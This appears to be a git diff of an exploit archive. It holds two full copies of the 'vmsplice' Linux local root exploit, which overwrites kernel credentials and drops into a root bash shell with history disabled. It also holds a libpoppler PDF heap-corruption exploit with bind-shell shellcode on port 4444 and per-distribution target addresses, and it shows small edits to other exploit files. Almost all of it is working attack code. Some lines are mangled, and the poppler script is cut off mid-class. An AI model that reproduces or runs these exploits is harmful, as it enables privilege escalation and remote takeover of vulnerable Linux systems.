"iretq" + : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL), + "i" (USER_CS), "r" (exit_code) + ); +} + +static_inline +void * get_current() +{ + unsigned long curr; + __asm__ __volatile__ ( + "movq %%gs:(0), %0" + : "=r" (curr) + ); + return (void *) curr; +} + +#else +#error "unsupported arch" +#endif + +#if defined (_syscall4) +#define __NR__vmsplice __NR_vmsplice +_syscall4( + long, _vmsplice, + int, fd, + struct iovec *, iov, + unsigned long, nr_segs, + unsigned int, flags) + +#else +#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl)) +#endif + +static uint uid, gid; + +void kernel_code() +{ + int i; + uint *p = get_current(); + + for (i = 0; i < 1024-13; i++) { + if (p[0] == uid && p[1] == uid && + p[2] == uid && p[3] == uid && + p[4] == gid && p[5] == gid && + p[6] == gid && p[7] == gid) { + p[0] = p[1] = p[2] = p[3] = 0; + p[4] = p[5] = p[6] = p[7] = 0; + p = (uint *) ((char *)(p + 8) + sizeof(void *)); + p[0] = p[1] = p[2] = ~0; + break; + } + p++; + } + + exit_kernel(); +} + +void exit_code() +{ + if (getuid() != 0) + die("wtf", 0); + + printf("[+] root\n"); + putenv("HISTFILE=/dev/null"); + execl("/bin/bash", "bash", "-i", NULL); + die("/bin/bash", errno); +} + +int main(int argc, char *argv[]) +{ + int pi[2]; + size_t map_size; + char * map_addr; + struct iovec iov; + struct page * pages[5]; + + uid = getuid(); + gid = getgid(); + setresuid(uid, uid, uid); + setresgid(gid, gid, gid); + + printf("-----------------------------------\n"); + printf(" Linux vmsplice Local Root Exploit\n"); + printf(" By qaaz\n"); + printf("-----------------------------------\n"); + + if (!uid || !gid) + die("!@#$", 0); + + /*****/ + pages[0] = *(void **) &(int[2]){0,PAGE_SIZE}; + pages[1] = pages[0] + 1; + + map_size = PAGE_SIZE; + map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE, + MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); + if (map_addr == MAP_FAILED) + die("mmap", errno); + + memset(map_addr, 0, map_size); + printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); + printf("[+] page: 0x%lx\n", pages[0]); + printf("[+] page: 0x%lx\n", pages[1]); + + pages[0]->flags = 1 << PG_compound; + pages[0]->private = (unsigned long) pages[0]; + pages[0]->count = 1; + pages[1]->lru.next = (long) kernel_code; + + /*****/ + pages[2] = *(void **) pages[0]; + pages[3] = pages[2] + 1; + + map_size = PAGE_SIZE; + map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE, + MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); + if (map_addr == MAP_FAILED) + die("mmap", errno); + + memset(map_addr, 0, map_size); + printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); + printf("[+] page: 0x%lx\n", pages[2]); + printf("[+] page: 0x%lx\n", pages[3]); + + pages[2]->flags = 1 << PG_compound; + pages[2]->private = (unsigned long) pages[2]; + pages[2]->count = 1; + pages[3]->lru.next = (long) kernel_code; + + /*****/ + pages[4] = *(void **) &(int[2]){PAGE_SIZE,0}; + map_size = PAGE_SIZE; + map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE, + MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); + if (map_addr == MAP_FAILED) + die("mmap", errno); + memset(map_addr, 0, map_size); + printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); + printf("[+] page: 0x%lx\n", pages[4]); + + /*****/ + map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE; + map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE, + MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); + if (map_addr == MAP_FAILED) + die("mmap", errno); + + memset(map_addr, 0, map_size); + printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); + + /*****/ + map_size -= 2 * PAGE_SIZE; + if (munmap(map_addr + map_size, PAGE_SIZE) < 0) + die("munmap", errno); + + /*****/ + if (pipe(pi) < 0) die("pipe", errno); + close(pi[0]); + + iov.iov_base = map_addr; + iov.iov_len = ULONG_MAX; + + signal(SIGPIPE, exit_code); + _vmsplice(pi[1], &iov, 1, 0); + die("vmsplice", errno); + return 0; +} + +// milw0rm.com [2008-02-09] diff --git a/platforms/linux/local/5093.c b/platforms/linux/local/5093.c index f56121c29..67747d023 100755 --- a/platforms/linux/local/5093.c +++ b/platforms/linux/local/5093.c @@ -1,147 +1,147 @@ -/* - * diane_lane_fucked_hard.c - * - * Linux vmsplice Local Root Exploit - * By qaaz - * - * Linux 2.6.23 - 2.6.24 - */ -#define _GNU_SOURCE -#include -#include -#include -#include -#include -#include - -#define TARGET_PATTERN " sys_vm86old" -#define TARGET_SYSCALL 113 - -#ifndef __NR_vmsplice -#define __NR_vmsplice 316 -#endif - -#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl)) -#define gimmeroot() syscall(TARGET_SYSCALL, 31337, kernel_code, 1, 2, 3, 4) - -#define TRAMP_CODE (void *) trampoline -#define TRAMP_SIZE ( sizeof(trampoline) - 1 ) - -unsigned char trampoline[] = -"\x8b\x5c\x24\x04" /* mov 0x4(%esp),%ebx */ -"\x8b\x4c\x24\x08" /* mov 0x8(%esp),%ecx */ -"\x81\xfb\x69\x7a\x00\x00" /* cmp $31337,%ebx */ -"\x75\x02" /* jne +2 */ -"\xff\xd1" /* call *%ecx */ -"\xb8\xea\xff\xff\xff" /* mov $-EINVAL,%eax */ -"\xc3" /* ret */ -; - -void die(char *msg, int err) -{ - printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err)); - fflush(stdout); - fflush(stderr); - exit(1); -} - -long get_target() -{ - FILE *f; - long addr = 0; - char line[128]; - - f = fopen("/proc/kallsyms", "r"); - if (!f) die("/proc/kallsyms", errno); - - while (fgets(line, sizeof(line), f)) { - if (strstr(line, TARGET_PATTERN)) { - addr = strtoul(line, NULL, 16); - break; - } - } - - fclose(f); - return addr; -} - -static inline __attribute__((always_inline)) -void * get_current() -{ - unsigned long curr; - __asm__ __volatile__ ( - "movl %%esp, %%eax ;" - "andl %1, %%eax ;" - "movl (%%eax), %0" - : "=r" (curr) - : "i" (~8191) - ); - return (void *) curr; -} - -static uint uid, gid; - -void kernel_code() -{ - int i; - uint *p = get_current(); - - for (i = 0; i < 1024-13; i++) { - if (p[0] == uid && p[1] == uid && - p[2] == uid && p[3] == uid && - p[4] == gid && p[5] == gid && - p[6] == gid && p[7] == gid) { - p[0] = p[1] = p[2] = p[3] = 0; - p[4] = p[5] = p[6] = p[7] = 0; - p = (uint *) ((char *)(p + 8) + sizeof(void *)); - p[0] = p[1] = p[2] = ~0; - break; - } - p++; - } -} - -int main(int argc, char *argv[]) -{ - int pi[2]; - long addr; - struct iovec iov; - - uid = getuid(); - gid = getgid(); - setresuid(uid, uid, uid); - setresgid(gid, gid, gid); - - printf("-----------------------------------\n"); - printf(" Linux vmsplice Local Root Exploit\n"); - printf(" By qaaz\n"); - printf("-----------------------------------\n"); - - if (!uid || !gid) - die("!@#$", 0); - - addr = get_target(); - printf("[+] addr: 0x%lx\n", addr); - - if (pipe(pi) < 0) - die("pipe", errno); - - iov.iov_base = (void *) addr; - iov.iov_len = TRAMP_SIZE; - - write(pi[1], TRAMP_CODE, TRAMP_SIZE); - _vmsplice(pi[0], &iov, 1, 0); - - gimmeroot(); - - if (getuid() != 0) - die("wtf", 0); - - printf("[+] root\n"); - putenv("HISTFILE=/dev/null"); - execl("/bin/bash", "bash", "-i", NULL); - die("/bin/bash", errno); - return 0; -} - -// milw0rm.com [2008-02-09] +/* + * diane_lane_fucked_hard.c + * + * Linux vmsplice Local Root Exploit + * By qaaz + * + * Linux 2.6.23 - 2.6.24 + */ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include + +#define TARGET_PATTERN " sys_vm86old" +#define TARGET_SYSCALL 113 + +#ifndef __NR_vmsplice +#define __NR_vmsplice 316 +#endif + +#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl)) +#define gimmeroot() syscall(TARGET_SYSCALL, 31337, kernel_code, 1, 2, 3, 4) + +#define TRAMP_CODE (void *) trampoline +#define TRAMP_SIZE ( sizeof(trampoline) - 1 ) + +unsigned char trampoline[] = +"\x8b\x5c\x24\x04" /* mov 0x4(%esp),%ebx */ +"\x8b\x4c\x24\x08" /* mov 0x8(%esp),%ecx */ +"\x81\xfb\x69\x7a\x00\x00" /* cmp $31337,%ebx */ +"\x75\x02" /* jne +2 */ +"\xff\xd1" /* call *%ecx */ +"\xb8\xea\xff\xff\xff" /* mov $-EINVAL,%eax */ +"\xc3" /* ret */ +; + +void die(char *msg, int err) +{ + printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err)); + fflush(stdout); + fflush(stderr); + exit(1); +} + +long get_target() +{ + FILE *f; + long addr = 0; + char line[128]; + + f = fopen("/proc/kallsyms", "r"); + if (!f) die("/proc/kallsyms", errno); + + while (fgets(line, sizeof(line), f)) { + if (strstr(line, TARGET_PATTERN)) { + addr = strtoul(line, NULL, 16); + break; + } + } + + fclose(f); + return addr; +} + +static inline __attribute__((always_inline)) +void * get_current() +{ + unsigned long curr; + __asm__ __volatile__ ( + "movl %%esp, %%eax ;" + "andl %1, %%eax ;" + "movl (%%eax), %0" + : "=r" (curr) + : "i" (~8191) + ); + return (void *) curr; +} + +static uint uid, gid; + +void kernel_code() +{ + int i; + uint *p = get_current(); + + for (i = 0; i < 1024-13; i++) { + if (p[0] == uid && p[1] == uid && + p[2] == uid && p[3] == uid && + p[4] == gid && p[5] == gid && + p[6] == gid && p[7] == gid) { + p[0] = p[1] = p[2] = p[3] = 0; + p[4] = p[5] = p[6] = p[7] = 0; + p = (uint *) ((char *)(p + 8) + sizeof(void *)); + p[0] = p[1] = p[2] = ~0; + break; + } + p++; + } +} + +int main(int argc, char *argv[]) +{ + int pi[2]; + long addr; + struct iovec iov; + + uid = getuid(); + gid = getgid(); + setresuid(uid, uid, uid); + setresgid(gid, gid, gid); + + printf("-----------------------------------\n"); + printf(" Linux vmsplice Local Root Exploit\n"); + printf(" By qaaz\n"); + printf("-----------------------------------\n"); + + if (!uid || !gid) + die("!@#$", 0); + + addr = get_target(); + printf("[+] addr: 0x%lx\n", addr); + + if (pipe(pi) < 0) + die("pipe", errno); + + iov.iov_base = (void *) addr; + iov.iov_len = TRAMP_SIZE; + + write(pi[1], TRAMP_CODE, TRAMP_SIZE); + _vmsplice(pi[0], &iov, 1, 0); + + gimmeroot(); + + if (getuid() != 0) + die("wtf", 0); + + printf("[+] root\n"); + putenv("HISTFILE=/dev/null"); + execl("/bin/bash", "bash", "-i", NULL); + die("/bin/bash", errno); + return 0; +} + +// milw0rm.com [2008-02-09] diff --git a/platforms/linux/local/586.c b/platforms/linux/local/586.c index f4d9a27c7..3861c0895 100755 --- a/platforms/linux/local/586.c +++ b/platforms/linux/local/586.c @@ -66,6 +66,6 @@ void nopea (void) { bzero (payload,sizeof(payload)); memset (payload,0x90,sizeof(payload)-1); memcpy (payload+sizeof(payload)-strlen(sha0code)-1,sha0code,strlen(sha0code)); -} - -// milw0rm.com [2004-10-20] +} + +// milw0rm.com [2004-10-20] diff --git a/platforms/linux/local/587.c b/platforms/linux/local/587.c index 08f80a3e5..2564b9169 100755 --- a/platforms/linux/local/587.c +++ b/platforms/linux/local/587.c @@ -160,6 +160,6 @@ sprintf(html,HTML_FORMAT,evilbuf); printf("%s",html); return 0; -} - -// milw0rm.com [2004-10-21] +} + +// milw0rm.com [2004-10-21] diff --git a/platforms/linux/local/591.c b/platforms/linux/local/591.c index f42900328..a2787bef6 100755 --- a/platforms/linux/local/591.c +++ b/platforms/linux/local/591.c @@ -106,6 +106,6 @@ int check(unsigned long addr) { addr = addr + 256; return addr; -} - -// milw0rm.com [2004-10-23] +} + +// milw0rm.com [2004-10-23] diff --git a/platforms/linux/local/600.c b/platforms/linux/local/600.c index 9b403f0ce..ce0531c48 100755 --- a/platforms/linux/local/600.c +++ b/platforms/linux/local/600.c @@ -162,6 +162,6 @@ int main(int argc, char **argv) close(fd); return 0; -} - -// milw0rm.com [2004-10-26] +} + +// milw0rm.com [2004-10-26] diff --git a/platforms/linux/local/601.c b/platforms/linux/local/601.c index a7e3920cf..8d65c3653 100755 --- a/platforms/linux/local/601.c +++ b/platforms/linux/local/601.c @@ -75,6 +75,6 @@ int main(int argc, char **argv) xmlNanoFTPNewCtxt(buf); return EXIT_SUCCESS; -} - -// milw0rm.com [2004-10-26] +} + +// milw0rm.com [2004-10-26] diff --git a/platforms/linux/local/6032.py b/platforms/linux/local/6032.py index a3b6c837b..6e8e888aa 100755 --- a/platforms/linux/local/6032.py +++ b/platforms/linux/local/6032.py @@ -1,550 +1,550 @@ -########################################################################## -#### Felipe Andres Manzano * fmanzano@fceia.unr.edu.ar #### -#### updates in http://felipe.andres.manzano.googlepages.com/home #### -########################################################################## -''' - - -Sumary: -======= - -The libpoppler pdf rendering library, can free uninitialized pointers, -leading to arbitrary code execution. This vulnerability results from -memory management bugs in the Page class constructor/destructor. - - -Technical Description - Exploit/Concept Code: -============================================= - -Tests were performed using libpoppler util pdftotext taken from -git://git.freedesktop.org/git/poppler/poppler. -Other version where tried succesfully (the ones shiped with -debian/gentoo). - -In the initialization of a Page object and under certain conditions a -member object skips initialization, but then is eventualy deleted. This -can be conducted to the situation in which an arbitrary pointer is -passed to the libc free and so the it gets apropiate for the malloc -maleficarum to enter the scene. - -Look at the Page class constructor on Page.cc:231. First at the begining -of the function the member object pageWidgets isnt initialized then it -tries to check if the type of the annotations proposed on the pdf file -ar correct; if not it bails out to the label err2. Note that is some -incorcondance on the type of the anotation arise the member variable -pageWidgets is never initialized! - -Page::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form *form) { - Object tmp; -[...] - // annotations - pageDict->lookupNF("Annots", &annots); - if (!(annots.isRef() || annots.isArray() || annots.isNull())) { - error(-1, "Page annotations object (page %d) is wrong type (%s)", - num, annots.getTypeName()); - annots.free(); - goto err2; - } - - // forms - pageWidgets = new FormPageWidgets(xrefA, this->getAnnots(&tmp),num,form); - tmp.free(); -[...] - err2: - annots.initNull(); - err1: - contents.initNull(); - ok = gFalse; -} - -But in the Page class destructor, Page.cc:309, pageWidgets is deleted -without any consideration. The Page destructor is inmediatelly called -after the erroneous Page construction. - -Page::~Page() { - delete pageWidgets; - delete attrs; - annots.free(); - contents.free(); -} - - -It is worth mentioning that the pdf rendering scenario is friendly with -the heap massage technics because you will find lots of ways to allocate -or allocate/free memory in the already probided functionality. In the -POC I have used repetidely the 'name' of the fields of a pdf dictionary -to allocate memory. Each name allocates up to 127bytes and apparently -there is no limit in the number of fields. - - -The following excerpt is a sample verification of the existence of -the problem : - -localhost expl-poppler # python poppler-exploit-rc8.py gentoo-pdftotext >test.pdf -localhost expl-poppler # pdftotext test.pdf -Error: PDF file is damaged - attempting to reconstruct xref table... -Error: Annotation rectangle is wrong type -Error: Bad bounding box for annotation -Error: Bad bounding box for annotation -Error: Bad bounding box for annotation -Error: Bad bounding box for annotation -Error: Bad bounding box for annotation -Error: Page annotations object (page 3) is wrong type (integer) -Error: Page count in top-level pages object is incorrect -Error: Couldnt read page catalog -Trace/breakpoint trap - -:) - - -Further research should be done to accomodate the heap for other applications like evince: -localhost expl-poppler # evince test.pdf - -(evince:8912): GnomeUI-WARNING **: While connecting to session manager: -Authentication Rejected, reason : None of the authentication protocols specified are supported and host-based authentication failed. - -** (evince:8912): WARNING **: Service registration failed. - -** (evince:8912): WARNING **: Did not receive a reply. Possible causes include: the remote application did not send a reply, the message bus security policy blocked the reply, the reply timeout expired, or the network connection was broken. -Error: PDF file is damaged - attempting to reconstruct xref table... -Error: Annotation rectangle is wrong type -Error: Bad bounding box for annotation -Error: Bad bounding box for annotation -Error: Bad bounding box for annotation -Error: Bad bounding box for annotation -Error: Bad bounding box for annotation -Error: Page annotations object (page 3) is wrong type (integer) -*** glibc detected *** evince: munmap_chunk(): invalid pointer: 0x08100468 *** - -Note that 0x08100468 is still a provided pointer. But in this try some -malloc structure like _heap_info (see. house of mind) is not correctly -aligned any more. Maybe evince-thumbnailer which is (probably -monothreaded) is an easier target. - - -Patch -===== - -diff --git a/poppler/Page.cc b/poppler/Page.cc -index b28a3ee..72a706b 100644 ---- a/poppler/Page.cc -+++ b/poppler/Page.cc -@@ -230,7 +230,7 @@ GBool PageAttrs::readBox(Dict *dict, char *key, PDFRectangle *box) { - - Page::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form *form) { - Object tmp; -- -+ pageWidgets = NULL; //Security fix - ok = gTrue; - xref = xrefA; - num = numA; - - -POC: -=== - -Written in pyploit. It can be used 2 ways , one selecting a preconfigured -target like *gentoo-pdftotext* or the other in which you could pass some -malloc/free execution trace moddifing parameters. - -''' - -import struct -import struct -import math -import os - -import sys - -## print "%.400f"%d wont work :( ... so a quick double printing class -class Doubles: - def __init__(self, precision=400): - self.precision=precision - - def pdficateint(self,i1,i2): - s = struct.pack("@L",i1) + struct.pack("@L",i2) - return self.pdficatestr(s) - - def pdficate(self,s): - rslt = " " - for pos in range (0,len(s)/8): - rslt+=self.pdficatestr(s[(pos*8):(pos*8)+8])+" " - return rslt; - - def pdficatestr(self, s): - d = struct.unpack("d",s)[0] - rslt=" " - if(d<0.0): - rslt+="-" - d=-d - rslt+="%d."%int(math.floor(d)) - myd=math.floor(d) - scale=0.1 - nines=0 - for p in range(1,self.precision): - for i in range(1,10): - if (myd+scale*i) > d: - i-=1 - break - if i==9: - if nines>6: - return rslt - else: - nines+=1 - else: - nines=0 - rslt+=("%02d"%i)[1] - myd+=scale* i - scale=scale*0.1 - return rslt - -##From Malloc maleficarum -##http://packetstormsecurity.org/papers/attack/MallocMaleficarum.txt -class HouseOfMind: - - HEAP_MAX_SIZE=(1024*1024) - JMP='\xeb' - NOP='\x90' - PAD='\x00' - PREV_INUSE=0x1 - IS_MMAPPED=0x2 - NON_MAIN_ARENA=0x4 - def __init__(self, base, where, payload, entrypoint): - self.base=base - self.where=where-0xc - self.heap_info = (base+self.HEAP_MAX_SIZE-1)& ~(self.HEAP_MAX_SIZE-1) - self.payload=payload - self.entrypoint=entrypoint - self.chunkaddress=0 - if (self.entrypoint > 0xff - 8): - throw - -## lendian, 32bit only -## See The Malloc Maleficarum / House of Mind - def mind(self): - rslt = "" - #first we add padding to reach the next Heap border - rslt+=self.PAD*(self.heap_info-self.base) - - #now we add a _heap_info pinting to a malloc_state of our own - #and dictating a generous size for this *heap* - ##arena.c:59 //struct _heap_info - rslt += struct.pack(" unlocked. - rslt += struct.pack(" +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ -# | Size of previous chunk, if allocated | | -# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ -# | Size of chunk, in bytes |M|P| -# mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ -# | User data starts here... . -# . . -# . (malloc_usable_size() bytes) . -# . | -#nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ -# | Size of chunk | -# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ - - - #chunk 0 There isn't a single reason for this to exist * wabaaaaaaaaaa! -# rslt += struct.pack(">\nstream...\nendstream\n"])) - catalog = PDFDict() - catalog.add("Type", PDFName("Catalog")) - catalog.add("Outlines", "3 0 R") - catalog.add("Pages", "4 0 R") - catalog.add("AcroForm", "<>") - - #for i in range(0,1000): - # catalog.add( "C"*82 + "%05d"%i, 0) - - outlines = PDFDict() - outlines.add("Type", PDFName("Outlines")) - outlines.add("Count",0) - - pages = PDFDict() - pages.add("Type", PDFName("Pages")) - pages.add("Kids","[ 8 0 R 6 0 R 5 0 R ]") - pages.add("Count","3") - - doc.add(PDFObject([catalog])) - doc.add(PDFObject([outlines])) - doc.add(PDFObject([pages])) - - page1 = PDFDict() - page1.add("Type", PDFName("Page")) - page1.add("Parent", "4 0 R") - page1.add("MediaBox","[ 0 0 612 792 ]") - page1.add("Contents", "1 0 R") - page1.add("Resources", "<< /ProcSet 6 0 R >>") - page1.add("Annots", "0") - - #malloc-fill-free lots of chunks of the size then used by Page class(88) - for pagesize in range(88,126): - payload = ("".join(["#%02x"%ord(struct.pack("@L",hm.chunkaddress)[i]) for i in range (0,4)]))*19 - payload += "B"*(pagesize-(len(payload)/3)) - for i in range(0,10): - page1.add(payload, 0) - - doc.add(PDFObject([page1])) - - page1 = PDFDict() - page1.add("Type", PDFName("Page")) - page1.add("Parent", "4 0 R") - page1.add("MediaBox","[ 0 0 612 792 ]") - page1.add("Contents", "1 0 R") - page1.add("Resources", "<< /ProcSet 6 0 R >>") - page1.add("Annots", "[7 0 R 7 0 R 7 0 R 7 0 R]") - - #massage session 1 - size=127 - for i in range(0,massage[0]): - page1.add( "A"*(size-5)+("%05d"%(i)), "B"*size) - - doc.add(PDFObject([page1])) - annots = PDFDict() - annots.add("Subtype","/Text") - - annots.add("BS", "<? - "0.0 "*massage[2] + " ]>>") - - annots.add("FT", "/Tx") - doc.add(PDFObject([annots])) - - page1 = PDFDict() - page1.add("Type", PDFName("Page")) - page1.add("Parent", "4 0 R") - page1.add("MediaBox","[ 0 0 612 792 ]") - page1.add("Contents", "1 0 R") - page1.add("Resources", "<< /ProcSet 6 0 R >>") - page1.add("Annots", "[7 0 R]") - doc.add(PDFObject([page1])) - doc.add(PDFObject(["<<>>"])) - doc.add(PDFObject(["[ /PDF ]"])) - return doc.__str__() - - -##Main -## Not every shellcode will work by now -## Only the ones that taken by 8bytes form an ieee754 double presicion float -## with an exponent not too positive ... :) - -## linux_ia32_bind - LPORT=4444 Size=84 Encoder=None http://metasploit.com -scode = "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" -scode += "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" -scode += "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" -scode += "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0" -scode += "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" -scode += "\x89\xe1\xcd\x80" - -#expl = PopplerExpl( ('\xcc'+'\x90')*((160-16)/2)) -expl = PopplerExpl(scode) - -targets = { - "gentoo-pdftotext":(0x08100000, 0x804c014, 1863, 20, 400), - "debian4-pdftotext":(0x08100000, 0x804bb18, 1879, 33, 400), - "gentoo-evince-thumbnailer": (0x8100000, 0x080712c4, 907, 34, 200), - -} - -if len( sys.argv )==1: - print "Comments -> fmanzano@fceia.unr.edu.ar" - print "Usage 1:" - print " %s "%sys.argv[0], targets.keys() - print "Usage 2:" - print " %s massage1 massage2 massage3 base got"%sys.argv[0] - print " The idea here is to align the _heap_info struct that commences with 0x08?00010 " - print " to the address 0x8?0000. For this pourpose move massage1/2/3. " - print " THIS STUPIDLY SIMPLE METHOD WOULD WORK FOR VERY FEW APPS !" - print " base is the 1024*1024 bytes aligned address to which we are trying to align everything" - print " got is the addres of the got where the thing is going to write the shellcode address" - print " BTW by now the shellcode is nop;int 3;nop...grooovy!.. NOT" -elif len( sys.argv )>2: - print expl.make(int(sys.argv[4][2:],16), int(sys.argv[5][2:],16), (int(sys.argv[1]),int(sys.argv[2]),int(sys.argv[3]))) -else: - #base: the expected heap limit (08100000,08200000,....08f00000... ) - #got: address of the got entry to change - #chinesse massage - base,got,massage1,massage2,massage3 = targets[sys.argv[1]] - print expl.make(base,got,(massage1,massage2,massage3)) - -# milw0rm.com [2008-07-08] +########################################################################## +#### Felipe Andres Manzano * fmanzano@fceia.unr.edu.ar #### +#### updates in http://felipe.andres.manzano.googlepages.com/home #### +########################################################################## +''' + + +Sumary: +======= + +The libpoppler pdf rendering library, can free uninitialized pointers, +leading to arbitrary code execution. This vulnerability results from +memory management bugs in the Page class constructor/destructor. + + +Technical Description - Exploit/Concept Code: +============================================= + +Tests were performed using libpoppler util pdftotext taken from +git://git.freedesktop.org/git/poppler/poppler. +Other version where tried succesfully (the ones shiped with +debian/gentoo). + +In the initialization of a Page object and under certain conditions a +member object skips initialization, but then is eventualy deleted. This +can be conducted to the situation in which an arbitrary pointer is +passed to the libc free and so the it gets apropiate for the malloc +maleficarum to enter the scene. + +Look at the Page class constructor on Page.cc:231. First at the begining +of the function the member object pageWidgets isnt initialized then it +tries to check if the type of the annotations proposed on the pdf file +ar correct; if not it bails out to the label err2. Note that is some +incorcondance on the type of the anotation arise the member variable +pageWidgets is never initialized! + +Page::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form *form) { + Object tmp; +[...] + // annotations + pageDict->lookupNF("Annots", &annots); + if (!(annots.isRef() || annots.isArray() || annots.isNull())) { + error(-1, "Page annotations object (page %d) is wrong type (%s)", + num, annots.getTypeName()); + annots.free(); + goto err2; + } + + // forms + pageWidgets = new FormPageWidgets(xrefA, this->getAnnots(&tmp),num,form); + tmp.free(); +[...] + err2: + annots.initNull(); + err1: + contents.initNull(); + ok = gFalse; +} + +But in the Page class destructor, Page.cc:309, pageWidgets is deleted +without any consideration. The Page destructor is inmediatelly called +after the erroneous Page construction. + +Page::~Page() { + delete pageWidgets; + delete attrs; + annots.free(); + contents.free(); +} + + +It is worth mentioning that the pdf rendering scenario is friendly with +the heap massage technics because you will find lots of ways to allocate +or allocate/free memory in the already probided functionality. In the +POC I have used repetidely the 'name' of the fields of a pdf dictionary +to allocate memory. Each name allocates up to 127bytes and apparently +there is no limit in the number of fields. + + +The following excerpt is a sample verification of the existence of +the problem : + +localhost expl-poppler # python poppler-exploit-rc8.py gentoo-pdftotext >test.pdf +localhost expl-poppler # pdftotext test.pdf +Error: PDF file is damaged - attempting to reconstruct xref table... +Error: Annotation rectangle is wrong type +Error: Bad bounding box for annotation +Error: Bad bounding box for annotation +Error: Bad bounding box for annotation +Error: Bad bounding box for annotation +Error: Bad bounding box for annotation +Error: Page annotations object (page 3) is wrong type (integer) +Error: Page count in top-level pages object is incorrect +Error: Couldnt read page catalog +Trace/breakpoint trap + +:) + + +Further research should be done to accomodate the heap for other applications like evince: +localhost expl-poppler # evince test.pdf + +(evince:8912): GnomeUI-WARNING **: While connecting to session manager: +Authentication Rejected, reason : None of the authentication protocols specified are supported and host-based authentication failed. + +** (evince:8912): WARNING **: Service registration failed. + +** (evince:8912): WARNING **: Did not receive a reply. Possible causes include: the remote application did not send a reply, the message bus security policy blocked the reply, the reply timeout expired, or the network connection was broken. +Error: PDF file is damaged - attempting to reconstruct xref table... +Error: Annotation rectangle is wrong type +Error: Bad bounding box for annotation +Error: Bad bounding box for annotation +Error: Bad bounding box for annotation +Error: Bad bounding box for annotation +Error: Bad bounding box for annotation +Error: Page annotations object (page 3) is wrong type (integer) +*** glibc detected *** evince: munmap_chunk(): invalid pointer: 0x08100468 *** + +Note that 0x08100468 is still a provided pointer. But in this try some +malloc structure like _heap_info (see. house of mind) is not correctly +aligned any more. Maybe evince-thumbnailer which is (probably +monothreaded) is an easier target. + + +Patch +===== + +diff --git a/poppler/Page.cc b/poppler/Page.cc +index b28a3ee..72a706b 100644 +--- a/poppler/Page.cc ++++ b/poppler/Page.cc +@@ -230,7 +230,7 @@ GBool PageAttrs::readBox(Dict *dict, char *key, PDFRectangle *box) { + + Page::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form *form) { + Object tmp; +- ++ pageWidgets = NULL; //Security fix + ok = gTrue; + xref = xrefA; + num = numA; + + +POC: +=== + +Written in pyploit. It can be used 2 ways , one selecting a preconfigured +target like *gentoo-pdftotext* or the other in which you could pass some +malloc/free execution trace moddifing parameters. + +''' + +import struct +import struct +import math +import os + +import sys + +## print "%.400f"%d wont work :( ... so a quick double printing class +class Doubles: + def __init__(self, precision=400): + self.precision=precision + + def pdficateint(self,i1,i2): + s = struct.pack("@L",i1) + struct.pack("@L",i2) + return self.pdficatestr(s) + + def pdficate(self,s): + rslt = " " + for pos in range (0,len(s)/8): + rslt+=self.pdficatestr(s[(pos*8):(pos*8)+8])+" " + return rslt; + + def pdficatestr(self, s): + d = struct.unpack("d",s)[0] + rslt=" " + if(d<0.0): + rslt+="-" + d=-d + rslt+="%d."%int(math.floor(d)) + myd=math.floor(d) + scale=0.1 + nines=0 + for p in range(1,self.precision): + for i in range(1,10): + if (myd+scale*i) > d: + i-=1 + break + if i==9: + if nines>6: + return rslt + else: + nines+=1 + else: + nines=0 + rslt+=("%02d"%i)[1] + myd+=scale* i + scale=scale*0.1 + return rslt + +##From Malloc maleficarum +##http://packetstormsecurity.org/papers/attack/MallocMaleficarum.txt +class HouseOfMind: + + HEAP_MAX_SIZE=(1024*1024) + JMP='\xeb' + NOP='\x90' + PAD='\x00' + PREV_INUSE=0x1 + IS_MMAPPED=0x2 + NON_MAIN_ARENA=0x4 + def __init__(self, base, where, payload, entrypoint): + self.base=base + self.where=where-0xc + self.heap_info = (base+self.HEAP_MAX_SIZE-1)& ~(self.HEAP_MAX_SIZE-1) + self.payload=payload 